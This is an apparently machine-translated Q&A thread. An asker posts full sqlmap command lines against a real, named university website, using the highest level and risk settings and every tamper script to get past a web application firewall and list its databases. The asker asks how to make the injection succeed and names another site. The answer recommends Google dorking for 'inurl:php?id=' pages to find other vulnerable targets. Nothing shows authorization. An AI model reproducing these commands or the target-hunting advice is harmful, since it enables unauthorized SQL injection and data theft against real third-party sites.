Sqlmap参数“可能无法注入”

Question

我以sqlmap开头，我有以下疑问：当我尝试使用此代码段使用sqlmap（试图绕过waf）时：

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

或这一个：

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

我看到控制台中出现：

[警告]启发式（基本）测试表明GET参数“选项”可能不可注入[警告]启发式（基本）测试表明GET参数“视图”可能不可注入

还尝试在我的网站内找到类似于以下网址的url： http : //www.cafe53rd.com/menu.php? item_id =3因为我检查了这种url最容易访问，但找不到该网站的网址Im审计。

在以下站点中正确的代码是什么（“ http：// prefing ...”）

对不起，我的英语不好。 非常感谢你。

Answer 1

该错误仅表明正在执行的“注入技术”类型无法给出肯定的响应。 我已经遇到了问题，并通过获取备用链接解决了它。 我建议使用search inurl：php？id =找到其他易受攻击的链接，然后将该链接插入sqlmap中。